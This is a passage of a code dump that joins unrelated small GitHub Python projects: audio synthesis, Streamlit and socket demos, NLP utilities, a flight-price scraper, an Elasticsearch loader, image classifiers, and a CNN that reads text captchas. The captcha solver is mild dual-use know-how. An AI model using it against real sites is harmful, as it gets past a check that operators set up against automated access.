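        head = fade_in * signal[:fade_samples] + fade_out * signal[-fade_samples:]
        return np.concatenate([head, signal[fade_samples:-fade_samples]])

    x = np.random.randn(44100)
    print(loop_crossfade(x, 4410).shape)  # (39690,)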
/ 20000))\n current_activations[:, 4:8] = activations[:, 4:8] * \\\n (1.0 + 0.25 * np.sin(2 * np.pi * ii * lfo_freq * 0.707107 / 20000))\n current_activations[:, 8:12] = activations[:, 8:12] * \\\n (1.0 + 0.25 * np.sin(2 * np.pi * ii * lfo_freq * 0.415253 / 20000))\n current_activations[:, 12:] = activations[:, 12:] * \\\n (1.0 + 0.25 * np.sin(2 * np.pi * ii * lfo_freq * 0.19258 / 20000))\n orig_hat = np.reshape(\n self._sess.run(\n self.outputLayer2, feed_dict={\n self.controller: current_activations}), [\n self.topology.output_size, -1])\n mag_buffer = np.hstack((mag_buffer, orig_hat))\n\n mag_buffer = 50 * mag_buffer\n bass_boost = np.ones(self.topology.output_size)\n bass_boost[20:29] *= np.linspace(1, 0.3, num=len(bass_boost[20:29]))\n bass_boost[29:40] *= np.linspace(0.3, 0.1, num=len(bass_boost[29:40]))\n bass_boost[40:57] *= np.linspace(0.1, 0.02, num=len(bass_boost[40:57]))\n bass_boost[57:80] *= np.linspace(0.02,\n 0.03, num=len(bass_boost[57:80]))\n bass_boost[80:114] *= np.linspace(0.03,\n 0.1, num=len(bass_boost[80:114]))\n bass_boost[114:160] *= np.linspace(0.1,\n 0.2, num=len(bass_boost[114:160]))\n bass_boost[160:] *= 0.2\n for ii in range(n_frames):\n mag_buffer[:, ii] = np.roll(\n mag_buffer[:, ii], int(values[:, 8])) * bass_boost\n T = do_rtpghi_gaussian_window(\n mag_buffer, len_window, int(hop_length)) # Initializes phase\n T = 0.2 * T / np.max(np.abs(T))\n crossfade_time = 1\n crossfade_time = int(crossfade_time * 44100)\n fade_in = np.log(np.linspace(1, 2.71, crossfade_time))\n fade_out = np.log(np.linspace(2.71, 1, crossfade_time))\n T[:crossfade_time] = fade_in * T[:crossfade_time] + \\\n fade_out * T[len(T) - crossfade_time:]\n U = T[:len(T) - crossfade_time]\n V = np.hstack((U, U, U, U))\n b, a = sci.signal.butter(16, 0.27, 'low', analog=False)\n S = sci.signal.lfilter(b, a, V)\n # Must be 16bit PCM to work with pygame\n sf.write(filename, S, 44100, subtype='PCM_16')\n","repo_name":"eigenfoo/modo-de-ambar","sub_path":"mini_canne/mini_canne.py","file_name":"mini_canne.py","file_ext":"py","file_size_in_byte":19022,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"177799623","text":"import streamlit as st\nimport pandas\n\ndata = {\n 'Series_1': [1,3,4,5,7],\n 'Series_2': [10, 30, 40, 100, 250],\n}\n\n\ndf = pandas.DataFrame(data)\n\n\nst.title('StreamLit')\nst.subheader('Introducing StreamLit Library in Python')\nst.write('''\n\nThis is streamlit.\nA python web framework\n\n''')\nst.write(df)\n\nst.line_chart(df)\nst.area_chart(df)\n\nmyslider = st.slider('Celsius')\nst.write(myslider, 'in Fahrenheit is', myslider * 9/5 + 32)","repo_name":"mhellnerdev/streamlit-py","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32408561862","text":"\n# Socket Library\nimport socket\nimport string\n\nprint(\" \")\nprint(\"*******************************************************\")\nprint(\"Welcome! 
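The LFO branch of play_synth above scales each activation group by 1 + 0.25*sin(...) at related rates. The per-frame gain factored out for clarity (lfo_gain and frames_per_cycle are illustrative names; 20000 matches the constant used above):

    import numpy as np

    def lfo_gain(frame_index, rate, depth=0.25, frames_per_cycle=20000):
        # One sinusoidal modulator; play_synth runs four of these at rates
        # rate * {1, 0.707107, 0.415253, 0.19258} across activation groups.
        return 1.0 + depth * np.sin(2 * np.pi * frame_index * rate / frames_per_cycle)

    print(lfo_gain(0, 5.0))     # 1.0 at phase zero
    print(lfo_gain(1000, 5.0))  # 1.25 at the crest (2*pi*1000*5/20000 = pi/2)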
Lets try to guess a number I'm thinking off...\")\nprint(\"*******************************************************\")\nprint(\" \")\n\n#Keep an open loop until the user inputs 'done\" which notifies the client and server to shut down\nDone = False\nwhile not Done:\n\n\t# Set host name and port number\n\thost = 'local host'\n\tport = 5005\n\n\t# TCP / IP protocol\n\t# create a socket\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n\t#connect the socket to server and port (127.0.0.1 used to denote localhost)\n\ts.connect(('127.0.0.1', port))\n\n\t#Ask the user to guess a number\n\tmsg = input(\"Enter the number (when finished type done): \")\n\n\t# if the user inputs 'done', shut down the server then shut down the client\n\tif (str(msg).lower() == 'done'):\n\t\tprint(\"Shutting down client, Goodbye!\")\n\t\ts.send(str(msg).encode())\n\t\tDone = True\n\ts.send(str(msg).encode())\n\n\t# receive message string from\n\tmsg = s.recv(1024)\n\n\t# print out the received message\n\twhile msg:\n\t\tprint('Received from Server: ' + msg.decode())\n\t\tmsg = s.recv(1024)\n\n# disconnect the socket\n\ts.close()\n","repo_name":"tlandsb/Artificial_Intelligence","sub_path":"AgentClient.py","file_name":"AgentClient.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19970163197","text":"from sys import stdin\r\r\ninput=stdin.readline\r\r\nfor _ in range(int(input())):\r\r\n\tn, k=list(map(int, input().split()))\r\r\n\ta=list(map(int, input().split()))\r\r\n\tb=[[]]\r\r\n\tb.clear()\r\r\n\tfor i in range(len(a)):\r\r\n\t\tb.append([a[i], i])\r\r\n\tb.sort()\r\r\n\tc=[-1 for i in range(len(a))]\r\r\n\tmp={};\r\r\n\tbaki=n\r\r\n\tfor i in range(n):\r\r\n\t\tif b[i][0] in mp.keys():\r\r\n\t\t\tmp[b[i][0]]+=1\r\r\n\t\telse:\r\r\n\t\t\tmp[b[i][0]]=1\r\r\n\t\tif(mp[b[i][0]]>k):\r\r\n\t\t\tc[b[i][1]]=0\r\r\n\t\t\tbaki-=1\r\r\n\tkoyta=baki//k\r\r\n\tct=1\r\r\n\tfor i in range(n):\r\r\n\t\tif c[b[i][1]]!=-1:\r\r\n\t\t\tcontinue\r\r\n\t\tc[b[i][1]]=ct\r\r\n\t\tct+=1\r\r\n\t\tif(ct>k):\r\r\n\t\t\tct=1\r\r\n\t\t\tkoyta-=1\r\r\n\t\tif koyta<=0:\r\r\n\t\t\tbreak\r\r\n\tfor i in c:\r\r\n\t\tif i==-1:\r\r\n\t\t\tprint(0)\r\r\n\t\telse:\r\r\n\t\t\tprint(i)","repo_name":"tanvirtareq/codeforces","sub_path":"1551B2.py","file_name":"1551B2.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25264981661","text":"import codecs, json, sys\n\nread_file = \"../data/busan.json\"\noutput_file1 = \"../load/busan_1.json\"\noutput_file2 = \"../load/busan_2.json\"\ndata = []\n\nwith codecs.open(read_file, 'rU', 'utf-8') as f:\n\tindex = 1\n\tcount = 1\n\n\tfor line in f:\n\t\tstrr = json.loads(line)\n\t\tstrr = str(strr)\n\t\tdata.append(strr)\n\t\tsp = strr.split(',')\n\t\tetc = \"\" #hum or temp\n\t\tetc_name = \"\"\n\t\ttime = \"\"\n\n\t\tfor i in range(len(sp)):\n\t\t\tsp[i] = str(sp[i])\n\t\t\tif \"LAT\" in sp[i]:\n\t\t\t\tLAT = sp[i].split(':')[1]\n\t\t\telif \"LNG\" in sp[i]:\n\t\t\t\tLNG = sp[i].split(':')[1]\n\t\t\telif \"HUM\" in sp[i] and count%2 ==0:\n\t\t\t\tetc = sp[i].split(':')[1]\n\t\t\t\tetc_name = \"HUM\"\n\t\t\telif \"TEMP\" in sp[i] and count%2 != 0:\n\t\t\t\tetc = sp[i].split(':')[1]\n\t\t\t\tetc_name = \"TEMP\"\n\t\t\telif \"time\" in sp[i]:\n\t\t\t\ttime = sp[i].split(':')[1] + \":\" + sp[i].split(':')[2] + \":\" + sp[i].split(':')[3]\n\n\t\tlocation = \"{ location : [\" + LNG + \",\" + LAT + \" ], 
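The guessing-game client above reconnects for every guess and expects a server listening on 127.0.0.1:5005. A minimal counterpart that accepts one connection and answers once; a sketch only, not the actual server from that repository (serve_once is a hypothetical name):

    import socket

    def serve_once(port=5005):
        # Accept a single connection, read one guess, reply, and close.
        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("127.0.0.1", port))
        srv.listen(1)
        conn, _ = srv.accept()
        guess = conn.recv(1024).decode()
        conn.send(f"got your guess: {guess}".encode())
        conn.close()
        srv.close()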
time: \"+ time +\", values:{\" + etc_name + \":\" + etc + \"}}\"\n\t\tlocation = location.replace(\"'\", \"\\\"\")\n\t\tcount = count +1\n\t\t#print(location)\n\n\t\tif count % 2 == 0:\n\t\t\tfile_name = output_file1\n\t\telse:\n\t\t\tfile_name = output_file2\n\n\t\twith open(file_name, 'a+') as file:\n\t\t\tfile.write(location+'\\n')","repo_name":"minkky/2018-KISTI","sub_path":"2018-KISTI(BaseLine)/public/python/createTest.py","file_name":"createTest.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2979254336","text":"from concurrent.futures import ThreadPoolExecutor\nimport random\nimport statistics\nimport matplotlib.pyplot as plt\nimport settings\n\n\ndef step(amount):\n coin = random.choice(['h', 't'])\n if coin == 'h':\n return amount * 1.5\n else:\n return amount * 0.6\n\ndef game(number_steps, initial_amount):\n current_amount = initial_amount\n step_results = []\n for i in range(0, number_steps):\n current_amount = step(current_amount)\n step_results.append(current_amount)\n return step_results\n\n\ndef simulation(number_players, initial_amount, number_steps):\n results = []\n with ThreadPoolExecutor(max_workers = 100) as executor:\n for p in range(0, number_players):\n future = executor.submit(game, number_steps, initial_amount)\n results.append(future.result())\n\n list_averages = []\n for i in range(0, number_steps):\n list_averages.append(statistics.mean([pr[i] for pr in results]))\n fig = plt.figure(\"Average\")\n plt.plot(list_averages)\n fig.savefig(f'output/result_{number_players}.png')\n \n\nsimulation(\n settings.NUMBER_OF_PLAYERS,\n settings.INITIAL_AMOUNT,\n settings.NUMBER_OF_STEPS\n)\n","repo_name":"brunotoshio/ergodicity-simulation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20421122939","text":"from pytrips.tools import nlp\nfrom util_codes import simple_tagger as st\n\n#util functions\ndef ngrams(tokens, n):\n\t'''\n\treturn all n-grams of given tokens as a list of tuples\n\t'''\n\treturn [i for i in zip(*[tokens[i:] for i in range(n)])]\n\ndef sub_grams(n_gram):\n\t'''\n\tgiven an n-gram, return all the sub n-1 grams as a list of tuples, if size is 1, than return empty\n\t'''\n\tif len(n_gram) == 1:\n\t\treturn list()\n\t\n\tresult = list()\n\tfor i in range(len(n_gram)):\n\t\tlst = list(n_gram)\n\t\tlst.pop(i)\n\t\tresult.append(tuple(lst))\n\treturn result\n\n\ndef sort(tu):\n\tlst = list(tu) \n\tn = len(lst) \n\tfor i in range(n): \n\t\tfor j in range(0, n-i-1): \n\t\t\tif lst[j] > lst[j+1]: \n\t\t\t\tlst[j], lst[j+1] = lst[j+1], lst[j] \n\treturn tuple(lst)\n\ndef gram_id(n_gram):\n\t'''\n\tassume n_gram is alrealy a tuple of integers\n\t'''\n\treturn str('.'.join([str(i) for i in n_gram]))\n\ndef pre_process_sent(sent):\n\t\n\ttoken_to_a_set = tag_a_sentence(sent)\n\twords = ['_START_']\n\tdic = {'_START_':'_START_'} #potential problem: is it possible that one word has different tags?\n\tdoc = nlp(sent)\n\n\ti = 0\n\n\twhile i < len(doc):\n\t\t\n\t\ttoken = doc[i]\n\n\t\ttoken_str = str(token)\n\n\t\tif str(token) == '':\n\t\t\ti += 1\n\t\t\tcontinue\n\t\tif token.ent_type_ != '':\n\t\t\ttag = token.ent_type_\n\t\t\tent = []\n\t\t\twhile i < len(doc) and doc[i].ent_type_ != '' and doc[i].ent_type_ == tag:\n\t\t\t\tent.append(str(doc[i]))\n\t\t\t\ti += 1\n\t\t\tent_name = ' 
'.join(ent)\n\t\t\twords.append(ent_name)\n\t\t\tdic[ent_name] = \"_{}_\".format(tag)\n\t\t\tcontinue\n\n\t\telif token.like_num:\n\t\t\twords.append(token_str)\n\t\t\tdic[token_str] = \"_NUMBER_\"\n\t\t\t\t\n\n\t\telif token.is_punct:\n\t\t\ti += 1\n\t\t\tcontinue\n\t\t\t#words.append(str(token))\n\t\t\t\n\t\t\t#dic[str(token)] = \"_PUNCT_\"\n\t\telif '*' in token_str or '=' in token_str or '#' in token_str:\n\t\t\ti += 1\n\t\t\tcontinue\t\t\n\n\n\t\telif token.is_stop:\n\t\t\twords.append(str(token))\n\t\t\tdic[str(token)] = '_STOP_'\n\n\t\telse:\n\t\t\tif str(token) in token_to_a_set and len(token_to_a_set[str(token)]) != 0:\n\t\t\t\twords.append(str(token))\n\t\t\t\tdic[str(token)] = frozenset(token_to_a_set[str(token)])\n\t\t\telse:\n\t\t\t\twords.append(str(token))\n\t\t\t\tdic[str(token)] = 'POS::' + token.pos_ \n\t\ti += 1\n\n\twords.append('_END_')\n\tdic['_END_'] = '_END_'\n\ttaggings = [dic[word] for word in words]\n\n\treturn words, taggings, dic\n\ndef tag_a_sentence(sentence):\n\twords_with_ontologies = {}\n\ttagging = st.tag_sentence(sentence)\n\t\n\tfor j, i in tagging:\n\t\tif str(i) not in words_with_ontologies:\n\t\t\tj = frozenset([str(s) for s in j])\n\n\t\t\twords_with_ontologies[str(i)] = j\n\treturn words_with_ontologies\n\n\n\n\n","repo_name":"ZhendongLiu/Lab-project","sub_path":"util_codes/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38821629399","text":"from bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport time\n\n\ndef get_ticket_info(dstation, astation, date, driver):\n url = \"http://flights.ctrip.com/booking/%s-%s-day-1.html?DDate1=%s\" % (dstation, astation, date)\n t1 = time.time()\n driver.get(url)\n t2 = time.time()\n print(\"get url:\", t2-t1)\n # time.sleep(5)\n\n initial_pagesource = driver.page_source\n while True:\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n # time.sleep(0.1)\n if initial_pagesource == driver.page_source:\n break\n initial_pagesource = driver.page_source\n# with open(\"xiaohuang.txt\", \"w\") as f:\n# f.write(driver.page_source)\n t1 = time.time()\n # soup = BeautifulSoup(driver.page_source)\n soup = BeautifulSoup(initial_pagesource, \"lxml\")\n t3 = time.time()\n print(\"bs4:\", t3-t1)\n result = soup.find_all(\"div\", class_=[\"search_box\", \"search_box_tag\", \"search_box_light\"])\n# print(len(result))\n# print(type(result[0]))\n result_list = []\n for ticket_info in result:\n # print(ticket_info.string)\n try:\n airplane_name = \"<\" + ticket_info.find_all('div', class_=[\"clearfix\", \"J_flight_no\"])[0].text + \">\"\n d_info_div = ticket_info.find_all('td', class_=[\"right\"])[0].find_all('div')\n airplane_dtime = \"<\" + d_info_div[0].text + \">\"\n airplane_dstation = d_info_div[1].text\n a_info_div = ticket_info.find_all('td', class_=[\"left\"])[0].find_all('div')\n airplane_atime = \"<\" + a_info_div[0].text + \">\"\n airplane_astation = a_info_div[1].text\n airplane_price = int(''.join(list(filter(str.isdigit, ticket_info.find_all('span', class_=[\"base_price02\"])[0].text))))\n\n result_list.append([airplane_name, airplane_dstation, airplane_astation, airplane_dtime, airplane_atime, airplane_price])\n except:\n pass\n t2 = time.time()\n print(\"parse the html:\", t2-t1)\n return sorted(result_list, key=lambda x: x[-1])\n\nif __name__ == \"__main__\":\n driver = webdriver.PhantomJS(executable_path=\"./phantomjs\", 
service_args=['--load-images=no'])\n result_list = get_ticket_info('CTU', 'SHA', '2018-02-27', driver)\n print(result_list)\n # t = SpiderThread('CTU', 'SHA', '2018-02-27')\n # t.start()\n # time.sleep(100)\n # print(t.get_result())","repo_name":"echobear313/surprise","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3296784576","text":"import os, sys \nfrom shutil import copy \nfrom PIL import Image\nfrom tqdm.auto import tqdm \n\n\nCUR_DIR = os.getcwd()\nBASE_DIR = CUR_DIR\nDATA_DIR = os.path.join(BASE_DIR, 'aug_dataset')\n\nfinal_data_dir = os.path.join(BASE_DIR, 'final_dataset')\n\ntrain_img_dir = os.path.join(DATA_DIR, 'images', 'train')\ntrain_lb_dir = os.path.join(DATA_DIR, 'labels', 'train')\n\nfinal_train_img_dir = os.path.join(final_data_dir, 'images', 'train')\nfinal_train_lb_dir = os.path.join(final_data_dir, 'labels', 'train')\n\n\nfiles = os.listdir(train_img_dir)\n\nprint(len(files))\n\ndef read_label(path):\n def handle_number(label):\n\n try:\n l, x, y, w, h = label[0], label[1], label[2], label[3], label[4]\n except:\n print(label)\n return None\n return [int(l), float(x), float(y), float(w), float(h)]\n with open(path, 'r') as fp:\n content = fp.read().strip('\\n')\n if len(content) == 0:\n return None\n ls = content.split('\\n')\n for item in ls:\n check = handle_number(item.split(' '))\n if check == None:\n print(ls)\n print(path)\n labels = [handle_number(item.split(' ')) for item in ls]\n return labels\n\ndef count_label(label):\n count = [0,0,0]\n for l in label:\n count[l[0]]+=1\n return count \n\ndef add(total, label):\n for i, item in enumerate(label):\n total[i] += item\n return total\n\ndef check_label(label, value=2):\n for l in label:\n if l[0] ==2:\n return True \n\n return False\n\ncnt = 0\ncount = [0, 0, 0]\nfor f in files:\n name, ext = os.path.splitext(f)\n lb_file = f'{name}.txt'\n\n img_path = os.path.join(train_img_dir, f)\n lb_path = os.path.join(train_lb_dir, lb_file)\n\n label = read_label(lb_path)\n if label == None:\n os.remove(img_path)\n os.remove(lb_path)\n print(f\"Remove empty {img_path}-{lb_path}\")\n else:\n c = count_label(label)\n count = add(count, c)\n\n check = check_label(label)\n if not check:\n os.remove(img_path)\n os.remove(lb_path)\n print(f\"Remove not incorrectly wearing {img_path}-{lb_path}\")\n else:\n cnt += 1\n\ndef convert_bbox(box, img_width, img_height):\n x_center = box[0]*img_width\n y_center = box[1]*img_height\n box_width = box[2]*img_width\n box_height = box[3]*img_height\n x_min = int(x_center - box_width/2)\n y_min = int(y_center - box_height/2)\n x_max = int(x_min + box_width)\n y_max = int(y_min + box_height)\n box = [x_min, y_min, x_max, y_max]\n return box\ndef filter_boxes(boxes, labels=None):\n new_boxes = []\n new_labels = []\n for index, box in enumerate(boxes):\n xmin, ymin, xmax, ymax = box[0], box[1], box[2], box[3]\n w = xmax - xmin\n h = ymax - ymin\n if (not (w<15 or h<15) and not (w 1 and c[1]<5:\n # data.append((c[2], img_path, lb_path))\n\n data.append((c[2], img_path, lb_path))\n\ndef sort_by_value(l):\n l.sort(key=lambda x:x[0], reverse=True)\n return l\n\ndata = sort_by_value(data)\n\nfor i in range(10):\n print(data[i])\n\nprint(len(data))\ndata = data[:479]\n\ncount = [0,0,0]\nfor item in data:\n label = read_label(item[-1])\n c = count_label(label)\n count = add(count, c)\nprint(count)\n\n\nfor item in tqdm(data):\n img_file = 
os.path.basename(item[1])\n    label_file = os.path.basename(item[-1])\n    tgt_image_path = os.path.join(final_train_img_dir, img_file)\n    tgt_label_path = os.path.join(final_train_lb_dir, label_file)\n    # print(tgt_image_path, tgt_label_path)\n\n    name, _ = os.path.splitext(img_file)\n    temp = os.path.join(final_train_img_dir, f'{name}.jpg')\n    if not os.path.exists(temp):\n        copy(item[1], tgt_image_path)\n        copy(item[-1], tgt_label_path)\n\n    # os.remove(tgt_image_path)\n    # os.remove(tgt_label_path)","repo_name":"hieutt99/facemask-detection-20211","sub_path":"dataset-build/zfilter.py","file_name":"zfilter.py","file_ext":"py","file_size_in_byte":4847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70502423849","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 11 00:46:09 2020\n\n@author: kora\n\"\"\"\n\nimport numpy as np \nimport matplotlib.pyplot as plt\n\nvals = np.random.normal(10,1,10000)\n\nplt.hist(vals,50)\nplt.show()\n#the 99th percentile\nnp.percentile(vals,99)\nnp.percentile(vals,90)\n\n\n#moment\n#first moment is the mean \nnp.mean(vals)\n#second moment is the variance; np.std gives its square root, the SD\nnp.std(vals)\n#the third moment is skew\nimport scipy.stats as sp \nsp.skew(vals)\n\n#The fourth moment is kurtosis \nsp.kurtosis(vals)\nnp.max(vals)","repo_name":"davidenoma/bioinformaticsscripts","sub_path":"Data Science/percentiles_and_moments.py","file_name":"percentiles_and_moments.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73216231209","text":"'''Given an integer array nums, return true if there exists a triple of indices (i, j, k) such that i < j < k and nums[i] < nums[j] < nums[k]; otherwise return false.'''\n'''Scan nums, updating the smallest value seen so far and the smallest value that has a smaller value before it; as soon as a number larger than both appears, return True'''\n\nfrom typing import List\n\n\nclass Solution:\n    def increasingTriplet(self, nums: List[int]) -> bool:\n        n = len(nums)\n        i, j = nums[0], 2**31\n        for k in range(n):\n            if nums[k] > j:\n                return True\n            elif nums[k] > i:\n                j = nums[k]\n            else:\n                i = nums[k]\n        return False\n\nnums = [2,1,5,0,4,6]\nnums = [1,2,3,4,5]\nnums = [20,100,10,12,5,13]\nprint(Solution().increasingTriplet(nums))","repo_name":"pwl607/LeetCodeSolutions","sub_path":"334. 
递增的三元子序列.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7306595522","text":"#!/usr/bin/python3\nimport csv, os\nfrom pathlib import Path\nfrom urllib.parse import urlparse\nimport configparser\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import bulk, streaming_bulk, parallel_bulk\nimport pprint\ncached_values={}\n\ndef preprocess_item(item, config):\n pass\n\n\ndef recreate_index(config):\n host = config.get('main', 'host')\n port = config.get('main', 'port')\n \n _index = config.get('main', 'index')\n _type = config.get('main', 'type')\n\n index_settings_file = config.get('main', 'index_settings')\n \n es = Elasticsearch([{'host': host, 'port': port}])\n # delete index if exists\n if es.indices.exists(_index):\n es.indices.delete(index=_index)\n # index settings\n settings={}\n es.indices.create(index=_index, body=settings)\n return es\n \ndef getcontent_csv(config):\n \n source_path = config.get('main', 'source_path')\n _index = config.get('main', 'index')\n _type = config.get('main', 'type')\n fieldnames = config.get('csv', 'header', fallback=None)\n #Parse field names if set\n fieldnames=fieldnames.split(',') if fieldnames is not None else None\n # Added support multi-character represented characters, such as tabs.\n delimiter = config.get('csv', 'delimiter')\n delimiter = str.encode(delimiter, 'utf-8')\n delimiter = delimiter.decode('unicode_escape')\n id_field = config.get('main', 'id_field', fallback=False)\n #print(id_field)\n \n\n with open(source_path, encoding='utf-8') as f:\n csvreader = csv.DictReader(f, fieldnames=fieldnames, delimiter=delimiter)\n for item in csvreader:\n #item = preprocess_item(row, config)\n \n action = {\n '_op_type': 'index',\n '_index': _index,\n '_type': _type,\n }\n \n if id_field:\n id = item[id_field]\n action['_id'] = id\n item.pop('_id', None)\n\n action['_source']=item\n #pprint.pprint(action)\n yield action\n\n\ndef push2es_stream(config):\n es = recreate_index(config)\n data = list(getcontent_csv(config))\n report = bulk(es, data)\n print(report)\n \n \ndef push2es_parallel(config):\n es = recreate_index(config)\n #paralell bulk\n for success, info in parallel_bulk(es, getcontent_csv(config), thread_count=4):\n if not success: print('Doc failed', info)\n \n \n \ndef csv2es(parallel=True):\n config = configparser.SafeConfigParser()\n config.read('config.ini')\n if parallel:\n push2es_parallel(config)\n else:\n push2es_stream(config)\n\nif __name__ == '__main__':\n csv2es(parallel=False)\n #csv2es()\n\n","repo_name":"fxarte/es_bulk","sub_path":"csv2es.py","file_name":"csv2es.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"7882901061","text":"import tensorflow as tf\r\nfrom tensorflow.keras import layers\r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\n\r\n# Define the input shape of the images\r\ninput_shape = (224, 224, 3)\r\n\r\n# Create a CNN model\r\nmodel = tf.keras.Sequential([\r\n layers.Conv2D(32, (3, 3), activation='relu', input_shape=input_shape),\r\n layers.MaxPooling2D((2, 2)),\r\n layers.Conv2D(64, (3, 3), activation='relu'),\r\n layers.MaxPooling2D((2, 2)),\r\n layers.Conv2D(128, (3, 3), activation='relu'),\r\n layers.MaxPooling2D((2, 2)),\r\n layers.Flatten(),\r\n layers.Dense(64, activation='relu'),\r\n layers.Dense(4, activation='softmax')\r\n])\r\n\r\n# Compile the 
model\r\nmodel.compile(optimizer='adam',\r\n loss='categorical_crossentropy',\r\n metrics=['accuracy'])\r\n\r\n# Create an ImageDataGenerator for data augmentation\r\ntrain_datagen = ImageDataGenerator(rescale=1./255,\r\n rotation_range=20,\r\n width_shift_range=0.2,\r\n height_shift_range=0.2,\r\n shear_range=0.2,\r\n zoom_range=0.2,\r\n horizontal_flip=True,\r\n fill_mode='nearest')\r\n\r\n# Load the training data from a directory\r\ntrain_data = train_datagen.flow_from_directory('C:/Users/Aayush Srivastava/New folder/dog_emot/images',\r\n target_size=input_shape[:2],\r\n batch_size=32,\r\n class_mode='categorical')\r\n\r\n# Create an ImageDataGenerator for preprocessing the validation data\r\nval_datagen = ImageDataGenerator(rescale=1./255)\r\n\r\n# Load the validation data from a directory\r\nval_data = val_datagen.flow_from_directory('C:/Users/Aayush Srivastava/New folder/dog_emot/images',\r\n target_size=input_shape[:2],\r\n batch_size=32,\r\n class_mode='categorical')\r\n\r\n# Train the model\r\nmodel.fit(train_data,\r\n validation_data=val_data,\r\n epochs=10)\r\n\r\n# Save the model\r\nmodel.save('dog_emotions_model.h5')\r\n","repo_name":"aksaayush/Dog_Emotions","sub_path":"dog_emotions.py","file_name":"dog_emotions.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27884393370","text":"import argparse\nimport pandas as pd\nimport re\nimport os\nimport html\nfrom sklearn.model_selection import train_test_split\n\ndef update_polarity(polarity):\n if polarity==0:\n return 0\n else:\n return 1\n\ndef preprocess_tweet(text):\n # remove HTML tags\n def remove_html_tags(sentence):\n sentence = html.unescape(sentence)\n sentence = sentence.replace(\"\\\\\", \"\")\n sentence = sentence.replace(\"\\r\", \" \")\n sentence = sentence.replace(\"\\n\", \" \")\n\n p = re.compile(r'\\/\\w+\\/')\n sentence = re.sub(p, ' ', sentence)\n\n p = re.compile('<.*?>')\n sentence = re.sub(p, ' ', str(sentence))\n\n sentence = re.sub(r'http\\S+', '', sentence)\n return sentence\n\n text = remove_html_tags(text)\n\n # remove @ Instances\n p = re.compile('@.*?\\s+')\n text = re.sub(p, '', text)\n\n return text\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"input_dataset\", type=str, help=\"input dataset file (.csv)\",\n )\n\n args = parser.parse_args()\n\n df = pd.read_csv(args.input_dataset, header=None,\n names=['polarity', 'id', 'date', 'query', 'user', 'tweet'], encoding='latin-1')\n\n df['polarity'] = df.polarity.apply(update_polarity)\n df['tweet'] = df.tweet.apply(preprocess_tweet)\n\n # Sampling 100000 entries (resource constraints)\n # df = df.sample(100000)\n\n df_train, df_val = train_test_split(df, test_size=0.2)\n df_val, df_test = train_test_split(df_val, test_size=0.5)\n\n data_dir = 'data'\n\n if not os.path.exists(data_dir):\n os.makedirs(data_dir)\n\n df_train.to_csv(os.path.join(data_dir, \"train.csv\"), sep=',', columns=['polarity', 'tweet'], index=False)\n df_val.to_csv(os.path.join(data_dir, \"validation.csv\"), sep=',', columns=['polarity', 'tweet'], index=False)\n df_test.to_csv(os.path.join(data_dir, \"test.csv\"), sep=',', columns=['polarity', 'tweet'], 
index=False)\n","repo_name":"mkartik/NLP_model_implementations","sub_path":"sentiment_analysis/generate_dataset.py","file_name":"generate_dataset.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1094390160","text":"import torch\nimport torch.nn as nn\nfrom torchvision.transforms.functional import to_tensor\nfrom torchvision.transforms import Compose, ToTensor\nfrom datasets import CaptchaData\nfrom models import CNN\nfrom PIL import Image\n\nsource = [str(i) for i in range(0, 10)]\nsource += [chr(i) for i in range(97, 97+26)]\nmodel_path = './model.pth'\n\ncnn = CNN()\nif torch.cuda.is_available():\n cnn = cnn.cuda()\n cnn.eval()\n cnn.load_state_dict(torch.load(model_path))\nelse:\n cnn.eval()\n cnn.load_state_dict(torch.load(model_path, map_location='cpu'))\n\n# img_path:单张图片路径\ndef captchaByPath(img_path):\n img = Image.open(img_path)\n img = to_tensor(img)\n if torch.cuda.is_available():\n img = img.view(1, 3, 32, 120).cuda()\n else:\n img = img.view(1, 3, 32, 120)\n output = cnn(img)\n output = output.view(-1, 36)\n output = nn.functional.softmax(output, dim=1)\n output = torch.argmax(output, dim=1)\n output = output.view(-1, 